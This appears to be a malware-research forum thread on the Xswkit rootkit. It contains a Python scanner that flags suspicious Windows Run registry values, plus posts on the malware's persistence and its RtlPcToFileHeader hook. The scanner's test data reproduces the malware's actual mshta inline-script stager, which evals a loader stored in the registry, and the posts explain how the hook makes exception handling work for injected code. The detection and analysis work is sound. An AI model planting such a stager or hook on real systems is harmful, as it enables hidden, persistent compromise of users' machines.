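# Constructed entries in (hive path, value name, data) form, modelled on the log above.
# The first two reproduce the malware's Run value; the third is an invented benign control.
MALICIOUS_DATA = r'''mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"'''
RUN_ENTRIES = [
    (r"HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run", "rundll32", MALICIOUS_DATA),
    (r"HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run", "rundll32", MALICIOUS_DATA),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
     r'"C:\Program Files\Vendor\updater.exe" /background'),
]

# Assumption: value names that impersonate Windows binaries. A value so named that
# launches a different executable is a tell on its own.
LOOKALIKE_NAMES = {"rundll32", "svchost", "explorer", "winlogon", "lsass", "services"}
INLINE_SCRIPT_RE = re.compile(r"\b(about|javascript|vbscript):", re.I)
REGREAD_RE = re.compile(r"RegRead\(\s*'([^']+)'\s*\)")


def launched_binary(data):
    """Base name of the first command-line token, lower-cased, without .exe."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', data)
    tok = (m.group(1) or m.group(2)) if m else ""
    base = tok.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def inspect_run_value(hive_path, name, data):
    """Return a verdict for one Run value, with the reasons and the loader key it reads."""
    reasons = []
    exe = launched_binary(data)
    if exe == "mshta" and INLINE_SCRIPT_RE.search(data):
        reasons.append("mshta launched with an inline script instead of an .hta file")
    if "RegRead(" in data and re.search(r"\beval\(", data):
        reasons.append("eval() of data read back from the registry (fileless second stage)")
    name_base = name.lower()[:-4] if name.lower().endswith(".exe") else name.lower()
    if name_base in LOOKALIKE_NAMES and name_base != exe:
        reasons.append(f"value named {name!r} but launches {exe!r}")
    m = REGREAD_RE.search(data)
    # the script is JScript, so its backslashes are doubled; undo that for the key path
    loader_key = m.group(1).replace("\\\\", "\\") if m else None
    return {"hive_path": hive_path, "value": name, "suspicious": bool(reasons),
            "reasons": reasons, "loader_key": loader_key}


def scan_run_entries(entries):
    """Only the entries that tripped at least one check."""
    return [r for r in (inspect_run_value(*e) for e in entries) if r["suspicious"]]


if __name__ == "__main__":
    for f in scan_run_entries(RUN_ENTRIES):
        print(f"{f['hive_path']} | {f['value']}")
        for why in f["reasons"]:
            print("   -", why)
        if f["loader_key"]:
            print("   - also remove:", f["loader_key"])
```

Feed it every Run key under HKEY_USERS, not just HKCU: the log shows the same value planted under .DEFAULT, S-1-5-18, S-1-5-19, S-1-5-20 and the interactive user's SID, and the script text reads HKCU\Software\ xsw\loader regardless of which hive it was started from.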
 #24817  by EP_X0FF
 Sat Jan 03, 2015 2:59 pm
Tigzy wrote:Ok, thanks for confirmation.
The customer that reported the problem said after removing the Run key the infection was back after a reboot. Which I can't reproduce. Seems weird, I'll ask to double check.
You posted above a list of various autostart locations from HKEY_USERS; they and all the bot data in the xsw/cxsw keys still need to be removed even if the malware isn't loaded.

This RtlPcToFileHeader hook is definitely from Xswkit, because it points directly to the malware binary injected into explorer.exe.
 #24818  by Tigzy
 Sat Jan 03, 2015 3:03 pm
Yeah, of course, he (I think) removed the Run key for the current user, which is the persistence item.
RtlPcToFileHeader: any idea why it needs to filter that one?

EDIT: The log I posted isn't from the customer; it's from a RogueKiller beta version I just compiled with new signatures.
 #24819  by EP_X0FF
 Sat Jan 03, 2015 3:28 pm
Tigzy wrote:RtlPcToFileHeader: Any idea why it needs to filter that one?
If your injected code triggers an exception, then try/except will not work, because your module is not in the loader list, and this is checked by SEH with RtlPcToFileHeader. By hooking this routine, one can force SEH to work.